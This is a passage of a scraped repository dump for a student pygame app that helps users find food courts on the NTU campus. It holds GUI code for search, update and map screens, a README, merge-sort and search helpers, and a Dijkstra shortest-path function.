pygame.transform.scale(original_image, (WIDTH, HEIGHT))\n window_surface.fill(WHITE)\n window_surface.blit(image, (BLIT_X, BLIT_Y)) ####change this to blit it\n # draw on image\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n if not (mouseX > WIDTH_INIT - 230 and mouseY < 100):\n mouseX_check = mouseX\n mouseY_check = mouseY\n posX, posY = mouse_to_pos(BLIT_X, BLIT_Y, WIDTH, HEIGHT, mouseX_check, mouseY_check)\n if posX != 0 and posY != 0:\n position_box = Textbox(WIDTH_INIT - 210, 10, 170, 20, \"Position: \" + str(posX) + \", \" + str(posY),\n BLACK)\n submit_button = Button(WIDTH_INIT - 210, 40, 140, 35, \"SUBMIT?\", GREY, 30)\n screen_counter = submit_button.move_and_click(mouseX, mouseY, GREEN, screen_counter, False)\n # FPS\n clock.tick(FPS)\n pygame.display.flip()\n\n if screen_counter == 2 and subscreen1_counter == 0 and subscreen2_counter == 0 and subscreen3_counter == 0:\n mouseX = mouseY = 0\n screen_running = True\n food_inputbox = Inputbox(250, 250, 300, 50, \"Food name: \", 30)\n min_price = Inputbox(350, 350, 75, 50, \"Min price($): \", 30)\n max_price = Inputbox(350, 500, 75, 50, \"Max price($): \", 30)\n aircon_tick_box = Inputbox(950, 350, 75, 50, \"Aircon Availability \", 30)\n # min_price = Inputbox()\n while screen_running:\n # draw on surface\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n window_surface.fill(WHITE)\n pygame.draw.line(window_surface, BLACK, [0, 200], [WIDTH_INIT, 200], 5)\n pygame.draw.line(window_surface, BLACK, [0, 600], [WIDTH_INIT, 600], 5)\n food_court_button = Button(400, 75, 400, 75, \"Food court lists\", GREY, 30)\n subscreen1_counter = food_court_button.move_and_click(mouseX, mouseY, GREEN, subscreen1_counter, False)\n update_button = Button(200, 675, 400, 75, \"Update information\", GREY, 30)\n subscreen3_counter = update_button.move_and_click(mouseX, mouseY, GREEN, subscreen3_counter, False)\n add_button = Button(650, 675, 400, 75, \"Add new food\", GREY, 30)\n subscreen4_counter = add_button.move_and_click(mouseX, mouseY, GREEN, subscreen4_counter, False)\n search_button = Button(900, 480, 200, 75, \"Search\", GREY, 30)\n subscreen2_counter = search_button.move_and_click(mouseX, mouseY, YELLOW, subscreen2_counter, False)\n # back button\n back_button = Button(0, HEIGHT_INIT - 75, 100, 75, \"BACK\", RED, 30)\n screen_counter = back_button.move_and_click(mouseX, mouseY, RED, screen_counter, True)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n # draw input box\n food_inputbox.input_text(event)\n min_price.input_text(event)\n max_price.input_text(event)\n aircon_tick_box.tick_box(event)\n pygame.display.flip()\n\n clock.tick(FPS)\n\n if subscreen1_counter == 1:\n mouseX = mouseY = 0\n screen_running = True\n page_counter = 1\n aircon1_tick_box = Inputbox(300, 625, 75, 75, \"Aircon: \", 25)\n category_inputbox = Inputbox(300, 710, 290, 75, \"Category: \", 25)\n distance_tick_box = Inputbox(950, 700, 75, 75, \"Sort by distance: \", 25)\n while screen_running:\n # initialize new used class\n used_graph1 = Graph()\n used_graph1.vertex_set = [i for i in g.vertex_set]\n results1 = get_all_stalls(foodcourt_list)\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n if aircon1_tick_box.active:\n results1 = search_by_aircon_availability(results1)\n if len(category_inputbox.string) > 0:\n category_search_list = search_by_category(category_inputbox.string, foodcourt_list)\n results1 = intersection(results1, category_search_list)\n\n for i in results1:\n i[\"Distance\"] = round(shortest_path(used_graph1, posX, posY, i[\"Food Court Name\"], True))\n if distance_tick_box.active:\n results1 = mergesort(results1, \"Distance\", False)\n\n page_limit = int(len(results1) / 10)\n page_remain = len(results1) % 10\n window_surface.fill(WHITE)\n\n # back button\n back_button1 = Button(0, HEIGHT_INIT - 75, 150, 75, \"BACK\", RED, 30)\n subscreen1_counter = back_button1.move_and_click(mouseX, mouseY, RED, subscreen1_counter, True)\n\n text1 = Textbox(0, 20, 200, 50, \"Food court\", BLACK, 14)\n text2 = Textbox(200, 20, 200, 50, \"Stall\", BLACK, 14)\n text3 = Textbox(400, 20, 200, 50, \"Category\", BLACK, 15)\n text4 = Textbox(600, 20, 350, 50, \"Address\", BLACK, 13)\n text5 = Textbox(950, 20, 75, 50, \"Aircon\", BLACK, 16)\n text6 = Textbox(1025, 20, 100, 50, \"Distance\", BLACK, 17)\n text7 = Textbox(1125, 20, 75, 50, \"Status\", BLACK, 17)\n pygame.draw.line(window_surface, BLACK, [0, 80], [WIDTH_INIT, 80], 5)\n\n if page_limit == 0:\n pass\n elif page_limit == 1 and page_remain == 0:\n pass\n elif page_counter == 1:\n scroll_right_button = Button(950, 625, 100, 50, 'Next', GREY)\n page_counter = scroll_right_button.click_only(GREEN, page_counter, False)\n elif (page_remain == 0 and page_counter == page_limit) or (page_counter == page_limit + 1):\n scroll_left_button = Button(800, 625, 100, 50, 'Previous', GREY)\n page_counter = scroll_left_button.click_only(RED, page_counter, True)\n else:\n scroll_right_button = Button(950, 625, 100, 50, 'Next', GREY)\n page_counter = scroll_right_button.click_only(GREEN, page_counter, False)\n scroll_left_button = Button(800, 625, 100, 50, 'Previous', GREY)\n page_counter = scroll_left_button.click_only(RED, page_counter, True)\n # draw table\n if page_limit != 0 and page_counter != page_limit + 1:\n for i in range((page_counter - 1) * 10, page_counter * 10):\n text1.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results1[i][\"Food Court Name\"])\n text2.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results1[i][\"Stall Name\"])\n text3.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results1[i][\"Category\"])\n text4.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, str(results1[i][\"Address\"]))\n text5.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50,\n str(results1[i][\"Aircon Availability\"]))\n text6.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, str(results1[i][\"Distance\"]))\n text7.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results1[i][\"Open/Close\"])\n pygame.draw.line(window_surface, BLACK, [0, 200 + (i - 1 - (page_counter - 1) * 10) * 50],\n [WIDTH_INIT, 200 + (i - 1 - (page_counter - 1) * 10) * 50], 1)\n if page_remain != 0:\n if page_counter == page_limit + 1:\n for i in range(page_remain):\n text1.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results1[i + page_limit * 10][\"Food Court Name\"])\n text2.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results1[i + page_limit * 10][\"Stall Name\"])\n text3.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results1[i + page_limit * 10][\"Category\"])\n text4.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results1[i + page_limit * 10][\"Address\"]))\n text5.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results1[i + page_limit * 10][\"Aircon Availability\"]))\n text6.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results1[i + page_limit * 10][\"Distance\"]))\n text7.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results1[i + page_limit * 10][\"Open/Close\"])\n pygame.draw.line(window_surface, BLACK, [0, 100 + (i + 1) * 500 / page_remain],\n [WIDTH_INIT, 100 + (i + 1) * 500 / page_remain], 1)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n aircon1_tick_box.tick_box(event)\n category_inputbox.input_text(event)\n distance_tick_box.tick_box(event)\n pygame.display.flip()\n clock.tick(FPS)\n\n if subscreen2_counter == 1:\n # variable or used object\n mouseX = mouseY = 0\n screen_running = True\n error = 0\n map_index = 0\n used_graph2 = Graph()\n used_graph2.vertex_set = [i for i in g.vertex_set]\n # get results list\n if len(max_price.string) == 0:\n max_price.string = str(sys.maxsize)\n if len(min_price.string) == 0:\n min_price.string = \"0\"\n results_list = []\n try:\n price_search_list = search_by_price(float(min_price.string), float(max_price.string), foodcourt_list)\n food_search_list = search_by_food(food_inputbox.string, foodcourt_list)\n results_list = intersection(food_search_list, price_search_list)\n for i in results_list:\n i[\"Distance\"] = round(shortest_path(used_graph2, posX, posY, i[\"Food Court Name\"], True))\n except ValueError:\n error = 1\n\n if aircon_tick_box.active:\n results_list = search_by_aircon_availability(results_list)\n page_counter = 1\n page_limit = int(len(results_list) / 10)\n page_remain = len(results_list) % 10\n # tick box\n price_tick_box = Inputbox(500, 625, 75, 75, \"Sort by price: \", 25)\n rating_tick_box = Inputbox(500, 710, 75, 75, \"Sort by rating: \", 25)\n distance_tick_box = Inputbox(900, 710, 75, 75, \"Sort by distance: \", 25)\n while screen_running:\n # get mouse pos\n mouseX = mouseY = 0\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n\n results = results_list\n if price_tick_box.active:\n results = mergesort(results, \"Price\", False)\n if rating_tick_box.active:\n results = mergesort(results, \"Rating\", True)\n if distance_tick_box.active:\n results = mergesort(results, \"Distance\", False)\n window_surface.fill(WHITE)\n # back_button\n back_button2 = Button(0, HEIGHT_INIT - 75, 150, 75, \"BACK\", RED, 30)\n subscreen2_counter = back_button2.move_and_click(mouseX, mouseY, RED, subscreen2_counter, True)\n # draw table\n text1 = Textbox(0, 20, 250, 50, \"Food court\", BLACK, 16)\n text2 = Textbox(250, 20, 250, 50, \"Stall\", BLACK, 16)\n text3 = Textbox(500, 20, 300, 50, \"Food name\", BLACK, 16)\n text4 = Textbox(800, 20, 100, 50, \"Distance\", BLACK)\n text5 = Textbox(900, 20, 100, 50, \"Price\", BLACK)\n text6 = Textbox(1000, 20, 100, 50, \"Rating\", BLACK)\n text7 = Textbox(1100, 20, 100, 50, \"Status\", BLACK)\n pygame.draw.line(window_surface, BLACK, [0, 80], [WIDTH_INIT, 80], 5)\n if error == 1:\n error_text = Textbox(0, -100, WIDTH_INIT, HEIGHT_INIT, \"Wrong input!\", RED, 40)\n if len(results) == 0:\n no_result_text = Textbox(0, 0, WIDTH_INIT, HEIGHT_INIT, \"No result was found!\", RED, 40)\n elif page_limit == 0:\n pass\n elif page_limit == 1 and page_remain == 0:\n pass\n elif page_counter == 1:\n scroll_right_button = Button(950, 625, 75, 75, 'Next', GREY)\n page_counter = scroll_right_button.click_only(GREEN, page_counter, False)\n elif (page_remain == 0 and page_counter == page_limit) or (page_counter == page_limit + 1):\n scroll_left_button = Button(800, 625, 75, 75, 'Previous', GREY)\n page_counter = scroll_left_button.click_only(RED, page_counter, True)\n else:\n scroll_right_button = Button(950, 625, 75, 75, 'Next', GREY)\n page_counter = scroll_right_button.click_only(GREEN, page_counter, False)\n scroll_left_button = Button(800, 625, 75, 75, 'Previous', GREY)\n page_counter = scroll_left_button.click_only(RED, page_counter, True)\n # draw table\n if page_limit != 0 and page_counter != page_limit + 1:\n for i in range((page_counter - 1) * 10, page_counter * 10):\n # map_button\n vars()[\"map_button\" + str(i - (page_counter - 1) * 10)] = Button(800, 100 + (\n i - (page_counter - 1) * 10) * 50, 100, 50, \"\", GREY)\n mapscreen2_counter, map_index = vars()[\n \"map_button\" + str(i - (page_counter - 1) * 10)].move_and_take(mouseX, mouseY, WHITE,\n mapscreen2_counter, False)\n try:\n map2_name = results[int(map_index + page_counter * 10)][\"Food Court Name\"]\n except TypeError:\n pass\n # if map2_name != 0:\n # print(map2_name)\n text1.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results[i][\"Food Court Name\"])\n text2.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results[i][\"Stall Name\"])\n text3.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results[i][\"Food Name\"])\n text4.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, str(results[i][\"Distance\"]))\n text5.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, str(results[i][\"Price\"]))\n text6.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, str(results[i][\"Rating\"]))\n text7.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results[i][\"Open/Close\"])\n pygame.draw.line(window_surface, BLACK, [0, 200 + (i - 1 - (page_counter - 1) * 10) * 50],\n [WIDTH_INIT, 200 + (i - 1 - (page_counter - 1) * 10) * 50], 1)\n\n if page_remain != 0:\n if page_counter == page_limit + 1:\n for i in range(page_remain):\n # map_button\n map_button = Button(800, 100 + i * 500 / page_remain, 100, 500 / page_remain, \"\", GREY)\n mapscreen2_counter, map_index = map_button.move_and_take(mouseX, mouseY, WHITE,\n mapscreen2_counter, True)\n try:\n map2_name = results[int(map_index * page_remain / 500 + page_limit * 10)][\n \"Food Court Name\"]\n except TypeError:\n pass\n text1.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results[i + page_limit * 10][\"Food Court Name\"])\n text2.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results[i + page_limit * 10][\"Stall Name\"])\n text3.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results[i + page_limit * 10][\"Food Name\"])\n text4.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results[i + page_limit * 10][\"Distance\"]))\n text5.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results[i + page_limit * 10][\"Price\"]))\n text6.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results[i + page_limit * 10][\"Rating\"]))\n text7.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results[i + page_limit * 10][\"Open/Close\"])\n pygame.draw.line(window_surface, BLACK, [0, 100 + (i + 1) * 500 / page_remain],\n [WIDTH_INIT, 100 + (i + 1) * 500 / page_remain], 1)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n price_tick_box.tick_box(event)\n rating_tick_box.tick_box(event)\n distance_tick_box.tick_box(event)\n if price_tick_box.active:\n if rating_tick_box.active:\n price_tick_box.active = False\n if distance_tick_box.active:\n price_tick_box.active = False\n if rating_tick_box.active:\n if price_tick_box.active:\n rating_tick_box.active = False\n if distance_tick_box.active:\n rating_tick_box.active = False\n if distance_tick_box.active:\n if price_tick_box.active:\n distance_tick_box.active = False\n if rating_tick_box.active:\n distance_tick_box.active = False\n pygame.display.flip()\n clock.tick(FPS)\n\n if subscreen3_counter == 1:\n mouseX = mouseY = 0\n screen_running = True\n used_price = used_rating = 0\n # input box\n fc_update_box = Inputbox(200, 10, 250, 75, \"Food Court Name: \", 15)\n stall_update_box = Inputbox(600, 10, 200, 75, \"Stall name: \", 15)\n food_update_box = Inputbox(875, 10, 150, 75, \"Food: \", 15)\n price_update_box = Inputbox(400, HEIGHT_INIT / 2 + 50, 100, 50, \"Price: \")\n rating_update_box = Inputbox(800, HEIGHT_INIT / 2 + 50, 100, 50, \"Rating: \")\n fc_only = stall_only = food_only = -1\n\n while screen_running:\n window_surface.fill(WHITE)\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n # back_button\n back_button3 = Button(0, HEIGHT_INIT - 75, 150, 75, \"BACK\", RED, 30)\n subscreen3_counter = back_button3.move_and_click(mouseX, mouseY, RED, subscreen3_counter, True)\n\n pygame.draw.line(window_surface, BLACK, [0, 95], [WIDTH_INIT, 95], 5)\n fc_list = get_fc_name(fc_update_box.string, foodcourt_list)\n\n for i in range(len(fc_list)):\n button = Button(0, 100 + 50 * i, 400, 50, \"\", GREY)\n fc_index = button.move_and_update(mouseX, mouseY, WHITE)\n try:\n fc_only = fc_list[int(fc_index)]\n fc_update_box.string = fc_only.name\n print(food_update_box.string)\n except:\n pass\n\n text = Textbox(0, 100 + 50 * i, 400, 50, fc_list[i].name, BLACK, 14)\n pygame.draw.line(window_surface, BLACK, [0, 150 + 50 * i], [400, 150 + 50 * i], 1)\n\n if fc_only != -1:\n stall_list = fc_only.getStallByName(stall_update_box.string)\n for i in range(len(stall_list)):\n button = Button(400, 100 + 50 * i, 400, 50, \"\", GREY)\n stall_index = button.move_and_update(mouseX, mouseY, WHITE)\n try:\n stall_only = stall_list[int(stall_index)]\n stall_update_box.string = stall_only.name\n except:\n pass\n text = Textbox(400, 100 + 50 * i, 400, 50, stall_list[i].name, BLACK, 14)\n pygame.draw.line(window_surface, BLACK, [400, 150 + 50 * i], [800, 150 + 50 * i], 1)\n\n if stall_only != -1:\n food_list = stall_only.getFood(food_update_box.string)\n for i in range(len(food_list)):\n button = Button(875, 100 + 50 * i, 150, 50, \"\", GREY)\n food_index = button.move_and_update(mouseX, mouseY, WHITE)\n try:\n food_only = food_list[int(food_index)]\n food_update_box.string = food_only.name\n except:\n pass\n text = Textbox(875, 100 + 50 * i, 150, 50, food_list[i].name, BLACK, 14)\n pygame.draw.line(window_surface, BLACK, [875, 150 + 50 * i], [1025, 150 + 50 * i], 1)\n if food_only != -1:\n text_food = Textbox(1025, 10, 75, 75, \"Price\", BLACK, 15)\n text_rating = Textbox(1100, 10, 100, 75, \"Rating\", BLACK, 15)\n text1 = Textbox(1025, 100, 75, 50, str(food_only.price), BLACK)\n text2 = Textbox(1100, 100, 100, 50, str(food_only.rating), BLACK)\n text_update = Textbox(0, 0, WIDTH_INIT, HEIGHT_INIT, \"UPDATE!!!\", RED, 30)\n text_and = Textbox(550, HEIGHT_INIT / 2 + 50, 100, 50, \"AND\", RED, 30)\n\n try:\n used_price = float(price_update_box.string)\n used_rating = float(rating_update_box.string)\n if used_rating <=5:\n update_button = Button(WIDTH_INIT - 150, HEIGHT_INIT - 75, 150, 75, \"UPDATE\", YELLOW, 30)\n subscreen3_counter = update_button.move_and_click(mouseX, mouseY, GREEN, subscreen3_counter,\n True)\n except:\n pass\n if not screen_running and used_rating!=0 and used_price!=0:\n update(used_price, used_rating, fc_only.name, stall_only.name, food_only.name, foodcourt_list)\n file_update_data = open(\"main_data.txt\", \"wb\")\n pickle.dump(foodcourt_list, file_update_data)\n file_update_data.close()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n fc_update_box.input_text(event)\n if fc_only != -1:\n stall_update_box.input_text(event)\n if stall_only != -1:\n food_update_box.input_text(event)\n if food_only != -1:\n price_update_box.input_text(event)\n rating_update_box.input_text(event)\n pygame.display.flip()\n clock.tick(FPS)\n\n if subscreen4_counter == 1:\n mouseX = mouseY = 0\n used_food = used_price = used_rating = 0\n screen_running = True\n # input box\n fc_update_box = Inputbox(200, 10, 250, 75, \"Food Court Name: \", 15)\n stall_update_box = Inputbox(600, 10, 200, 75, \"Stall name: \", 15)\n food_update_box = Inputbox(500, 500, 250, 75, \"Food: \", 30)\n price_update_box = Inputbox(500, 600, 150, 75, \"Price: \", 30)\n rating_update_box = Inputbox(500, 700, 150, 75, \"Rating: \", 30)\n fc_only = stall_only = -1\n while screen_running:\n window_surface.fill(WHITE)\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n # back_button\n back_button4 = Button(0, HEIGHT_INIT - 75, 150, 75, \"BACK\", RED, 30)\n subscreen4_counter = back_button4.move_and_click(mouseX, mouseY, RED, subscreen4_counter, True)\n\n pygame.draw.line(window_surface, BLACK, [0, 95], [WIDTH_INIT, 95], 5)\n fc_list = get_fc_name(fc_update_box.string, foodcourt_list)\n\n for i in range(len(fc_list)):\n button = Button(0, 100 + 50 * i, 400, 50, \"\", GREY)\n fc_index = button.move_and_update(mouseX, mouseY, WHITE)\n try:\n fc_only = fc_list[int(fc_index)]\n fc_update_box.string = fc_only.name\n print(food_update_box.string)\n except:\n pass\n\n text = Textbox(0, 100 + 50 * i, 400, 50, fc_list[i].name, BLACK, 14)\n pygame.draw.line(window_surface, BLACK, [0, 150 + 50 * i], [400, 150 + 50 * i], 1)\n\n if fc_only != -1:\n stall_list = fc_only.getStallByName(stall_update_box.string)\n for i in range(len(stall_list)):\n button = Button(400, 100 + 50 * i, 400, 50, \"\", GREY)\n stall_index = button.move_and_update(mouseX, mouseY, WHITE)\n try:\n stall_only = stall_list[int(stall_index)]\n stall_update_box.string = stall_only.name\n except:\n pass\n text = Textbox(400, 100 + 50 * i, 400, 50, stall_list[i].name, BLACK, 14)\n pygame.draw.line(window_surface, BLACK, [400, 150 + 50 * i], [800, 150 + 50 * i], 1)\n if stall_only != -1:\n text_update = Textbox(0, 0, WIDTH_INIT, HEIGHT_INIT - 100, \"ADD NEW FOOD!!!\", RED, 30)\n try:\n used_price = float(price_update_box.string)\n used_rating = float(rating_update_box.string)\n used_food = food_update_box.string\n if used_rating <=5:\n update_button = Button(WIDTH_INIT - 150, HEIGHT_INIT - 75, 150, 75, \"ADD\", YELLOW, 30)\n subscreen4_counter = update_button.move_and_click(mouseX, mouseY, GREEN, subscreen3_counter,\n True)\n except:\n pass\n\n if not screen_running and used_price!=0 and used_rating!=0 and len(used_food)>0:\n add(used_price, used_rating, fc_only.name, stall_only.name, used_food, foodcourt_list)\n file_update_data = open(\"main_data.txt\", \"wb\")\n pickle.dump(foodcourt_list, file_update_data)\n file_update_data.close()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n fc_update_box.input_text(event)\n if fc_only != -1:\n stall_update_box.input_text(event)\n if stall_only != -1:\n food_update_box.input_text(event)\n price_update_box.input_text(event)\n rating_update_box.input_text(event)\n\n pygame.display.flip()\n clock.tick(FPS)\n\n if mapscreen2_counter == 1:\n # variable\n mouseX = mouseY = 0\n screen_running = True\n used_graph3 = Graph()\n used_graph3.vertex_set = [i for i in g.vertex_set]\n draw_path = [i for i in shortest_path(used_graph3, posX, posY, map2_name, False)]\n image = pygame.transform.scale(original_image, (WIDTH_INIT, HEIGHT_INIT))\n while screen_running:\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n window_surface.fill(WHITE)\n window_surface.blit(image, (0, 0))\n # back button\n back_button_map = Button(0, HEIGHT_INIT - 75, 100, 75, \"BACK\", RED, 30)\n mapscreen2_counter = back_button_map.move_and_click(mouseX, mouseY, RED, mapscreen2_counter, True)\n # draw initial point\n pygame.draw.circle(window_surface, RED, (posX, posY), 6)\n # draw path\n for i in range(len(draw_path) - 1):\n pygame.draw.line(window_surface, BLACK, draw_path[i], draw_path[i + 1], 5)\n pygame.draw.line(window_surface, BLACK, draw_path[-1], (posX, posY), 5)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n pygame.display.flip()\n clock.tick(FPS)\n\n\n################DATA#####################\n# this list contains foodcourt object\n\n################DATA####################\n\n###define variables\n\n###main program\n\nmain()\n" }, { "alpha_fraction": 0.7427598237991333, "alphanum_fraction": 0.7546848654747009, "avg_line_length": 47.91666793823242, "blob_id": "61e0ce4d7b13bc5f3231230905a594934d7f853c", "content_id": "d67a0ac2727a6c46549ed2ac0e3940d3d829e7f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 587, "license_type": "no_license", "max_line_length": 168, "num_lines": 12, "path": "/README.txt", "repo_name": "nhanpotter/NTU-FoodBeverage", "src_encoding": "UTF-8", "text": "Hi!!!!\nThis is a Python app that suggest users with Canteen information in NTU Campus.\n\nHow to open this app:\n1. Open Terminal\n2. Install pygame library with this command: pip install pygame\n5. Run file main_project.py\n6. Enjoy the app!!!!\n\nInstructions:\n1. Update your location by clicking on the map.(Remember you can zoom in and zoom out with \"[\" and \"]\" button; Move the map with 4 arrows) Click Submit when you finish.\n2. In the main pag, there are Food Court lists, Search Engine, Update Information feature and Add new food feature. This app is very user-friendly so have fun!!!!\n" }, { "alpha_fraction": 0.5894466042518616, "alphanum_fraction": 0.5956671237945557, "avg_line_length": 34.272727966308594, "blob_id": "b45011bca914804be0dc240cd289408685e9a88e", "content_id": "30e0ef2ea549036613cd0ef0203d6b85b826e890", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4662, "license_type": "no_license", "max_line_length": 151, "num_lines": 132, "path": "/sort_and_search.py", "repo_name": "nhanpotter/NTU-FoodBeverage", "src_encoding": "UTF-8", "text": "def search_by_food(foodname, foodcourt_list):\n __results = []\n for foodcourts in foodcourt_list:\n list1 = foodcourts.searchFoodByName(\n foodname) # extracting each result out from the dict, because searchFoodByName function returns a list of dict\n for result in list1:\n __results.append(result)\n return __results\n\n\ndef search_by_price(min_price, max_price, foodcourt_list):\n __results = []\n for foodcourts in foodcourt_list:\n list1 = foodcourts.searchByPrice(min_price,\n max_price) # extracting each result out from the dict, because searchByPrice function returns a list of dict.\n for result in list1:\n __results.append(result)\n return __results\n\n\ndef merge(left_list, right_list,key_name,reverse):\n result_list = []\n\n # while left and right list has elements\n while left_list and right_list:\n if reverse == False:\n if left_list[0][key_name] < right_list[0][key_name]:\n result_list.append(left_list[0])\n left_list.pop(0)\n else:\n result_list.append(right_list[0])\n right_list.pop(0)\n if reverse == True:\n if left_list[0][key_name] > right_list[0][key_name]:\n result_list.append(left_list[0])\n left_list.pop(0)\n else:\n result_list.append(right_list[0])\n right_list.pop(0)\n # left list still contain elements. Append its contents to end of the result list\n if left_list:\n result_list.extend(left_list)\n else:\n # right list still contain elements. Append its contents to end of the result list\n result_list.extend(right_list)\n\n return result_list\n\n\ndef mergesort(list_of_items, key_name,reverse):\n list_len = len(list_of_items)\n\n # base case\n if list_len < 2:\n return list_of_items\n left_list = list_of_items[:list_len // 2] # //\n right_list = list_of_items[list_len // 2:] # \"//\" to force division\n\n # merge sort left and right list recursively\n left_list = mergesort(left_list,key_name,reverse)\n right_list = mergesort(right_list,key_name,reverse)\n return merge(left_list, right_list,key_name,reverse)\n\n# def sortBy(__result, key_name,sortBy):\n# __result = sorted(__result, key=lambda k: k[key_name],\n# reverse=sortBy) # sort the results according to price/ ratings\n# return __result\n\n\ndef search_by_category(user_food_category,foodcourt_list):\n __results = []\n for foodcourts in foodcourt_list:\n list1 = foodcourts.searchByCategory(\n user_food_category) # extracting each result out from the dict, because searchByCategory function returns a list of dict.\n for result in list1:\n __results.append(result)\n return __results\n\ndef search_by_aircon_availability(list):\n __results = []\n for i in list:\n if i[\"Aircon Availability\"] == \"Yes\":\n __results.append(i)\n return __results\n\n\ndef search_for_foodlist(user_fcname, user_stallname,foodcourt_list):\n __results = []\n for fc in foodcourt_list:\n if fc.name == user_fcname:\n stall = fc.getStallByName(user_stallname)\n list1 = stall.getFoods()\n for result in list1:\n __results.append(result)\n return __results\n\ndef intersection(list1,list2):\n __results =[]\n for i in list1:\n for j in list2:\n if i ==j:\n __results.append(i)\n return __results\n\ndef get_all_stalls(foodcourt_list):\n __results = []\n for fc in foodcourt_list:\n list1 = fc.getStalls()\n for i in list1:\n __results.append(i)\n return __results\ndef get_fc_name(user_input,foodcourt_list):\n __results = []\n for fc in foodcourt_list:\n if user_input.lower() in fc.name.lower():\n __results.append(fc)\n return __results\n\ndef update(new_price,new_rating,fc_name,stall_name,food_name,foodcourt_list):\n for fc in foodcourt_list:\n if fc_name.lower() == fc.name.lower():\n for stall in fc.stall_list:\n if stall_name.lower() == stall.name.lower():\n for food in stall.food_list:\n if food_name.lower() == food.name.lower():\n food.price = new_price\n food.rating = new_rating\n\ndef add(new_price,new_rating,fc_name,stall_name,food_name,foodcourt_list):\n for fc in foodcourt_list:\n if fc_name.lower() == fc.name.lower():\n fc.addFood(stall_name,food_name,new_price,new_rating)\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6027960777282715, "alphanum_fraction": 0.6036184430122375, "avg_line_length": 32.80555725097656, "blob_id": "db9ea306249802c32cb102768c0576448c4783b5", "content_id": "019c6dd1642a927284365027b5bcce45b23c4866", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1216, "license_type": "no_license", "max_line_length": 95, "num_lines": 36, "path": "/shortest_distance.py", "repo_name": "nhanpotter/NTU-FoodBeverage", "src_encoding": "UTF-8", "text": "import heapq\n\ndef shortest_path(g,posX,posY,end_ver,number):\n queue = []\n init_index = g.set_start(posX,posY)\n heapq.heappush(queue,g.vertex_set[init_index])\n\n while len(queue) >0:\n actual_vertex = heapq.heappop(queue)\n use_index = g.get_index(actual_vertex.name)\n g.vertex_set[use_index].visited = True\n for key, value in actual_vertex.adjacent.items():\n index = g.get_index(key)\n new_distance = actual_vertex.distance + value\n if not g.vertex_set[index].visited and new_distance < g.vertex_set[index].distance:\n g.vertex_set[index].predecessor = g.vertex_set[use_index]\n g.vertex_set[index].distance = new_distance\n heapq.heappush(queue,g.vertex_set[index])\n\n final_index = g.get_index(end_ver)\n node = g.vertex_set[final_index]\n if number == True:\n return node.distance\n else:\n path = []\n while node is not None:\n path.append(node.coordinates)\n node = node.predecessor\n return path\n\n\n\n # print(\"Shortest path to target is: \",node.distance)\n # while node is not None:\n # print(node.name)\n # node = node.predecessor" } ]
4
MattPlahuta/computer-health-in-python
https://github.com/MattPlahuta/computer-health-in-python
1cd3877960dd943078db7f91ffa254f474064dcf
89c39dd47fd3090f2f42a20cc90725c84b6ac846
7bb9b1375d55a7dfe7a46cd24c56a44c1e860df6
refs/heads/master
2021-04-15T08:49:49.261223
2018-03-23T17:23:36
2018-03-23T17:23:36
126,516,087
0
0
null
null
null
null
null
